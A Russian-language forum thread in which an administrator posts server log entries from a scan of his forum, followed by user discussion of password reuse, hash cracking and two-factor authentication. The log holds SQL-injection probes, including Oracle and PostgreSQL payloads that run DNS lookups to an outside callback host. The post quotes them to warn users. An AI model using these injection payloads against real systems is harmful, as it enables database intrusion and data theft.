Хакерские атаки на форум

Тема в разделе "Работа форума", создана пользователем admin, 27 янв 2019.

  1. admin

    admin Администратор Команда форума

    Кто то пакостит - пускает медленный ддос и сканирует форум на уязвимости.

    Код:
    [client 194.48.97.104] File does not exist: bitalk.org/data/attachments/16||UTL_INADDR.get_host_address('dns.'||'sqli.058417.275-72211.275.52b39.1.bxss'||'.me'), referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/attachments/'||UTL_INADDR.get_host_address('dns.'||'sqli.058417.275-72212.275.52b39.1.bxss'||'.me')||', referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/attachments/16;copy (select '') to program 'nslookup dns.sqli.\\058417.275-72213.275.52b39.\\1.bxss.me', referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/attachments/16';copy (select '') to program 'nslookup dns.sqli.\\058417.275-72214.275.52b39.\\1.bxss.me, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/attachments/22', referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/1'", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\\, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/@@8uMwi, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/JyI=, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\xbf'\xbf", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\xf0''\xf0"", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/1'", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\\, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/@@zQVmV, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/JyI=, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\xbf'\xbf", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\xf0''\xf0"", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/1'", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\\, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/@@sjAFN, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/JyI=, referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\xbf'\xbf", referer: https://bitalk.org
    [client 194.48.97.104] File does not exist: bitalk.org/data/\xf0''\xf0"", referer: https://bitalk.org
    
    Если форум вдруг начинает медленно работать - пишите в чате или мне в ЛС.
     
    moordraal нравится это.
  2. moordraal

    moordraal Постоянный пользователь Проверенный

    А в чем смысл всей этой ахинеи? Чисто базу паролей взломать? Финансово, тут взломщики явно не обогатятся. Или кто то из забаненных пытается обиду выразить в подрыве работы форума?
     
  3. admin

    admin Администратор Команда форума

    Насчет взломов - смысл есть, чтобы подобрать пароли к биржам. Так, в прошлом году битс.медиа взломали.
    Понятно, что форум не хранит пароли в открытом виде, но хеш можно подобрать, ведь большинство продолжают использовать слабые пароли, думая, что добавление пары цифр вида neo123 или MaksiM1990 их защитит. И такие же пароли ставят на почты и акки бирж.
    Хакеры также могут не угонять базу, а поправить скрипты и перехватывать пароли в процессе авторизации.

    Хоть я и принял кое какие нетривиальные меры по защите, понятно, что при желании взламывается все.

    Что касается медленного ддоса - это чистое вредительство. Такой ддос не ставит целью положить сайт, его задача затормозить работу сайта, чтобы медленнее открывались страницы. Подобным есть смысл заниматься конкурентам или недоброжелателям.
     
  4. admin

    admin Администратор Команда форума

    Кстати, в истории с Битс Медиа как раз перехватывали пароли.
    Лишний аргумент в пользу того, чтобы не использовать везде один и тот же пароль. И даже похожие с добавлением или изменением последней цифры.
     
  5. moordraal

    moordraal Постоянный пользователь Проверенный

    на биржах у всех двухфакторка же, да же если подберут пароль то следующую ступень защиты не обойти
     
  6. admin

    admin Администратор Команда форума

    Главное, чтобы такой же пароль не был установлен на почте.
     
  7. XCoinX

    XCoinX Непостоянный пользователь

    Почту тоже нужно еще узнать, плюс почт может быть несколько.
     
  8. moordraal

    moordraal Постоянный пользователь Проверенный

    так у почтовых же, тоже двухфакторка. Для взлома как минимум нужно еще и мобилку иметь
     
  9. XCoinX

    XCoinX Непостоянный пользователь

    С мобилой иногда проблем еще больше. Недавно в интернете инфа появилась, как ВК взламывали, там просто переадресацию делали и востановливали пароль. Короче уязвимостей везде хватает.
     
  10. admin

    admin Администратор Команда форума

    Серьезно, ты двухфакторку на почтовый ставишь? Или только при смене IP?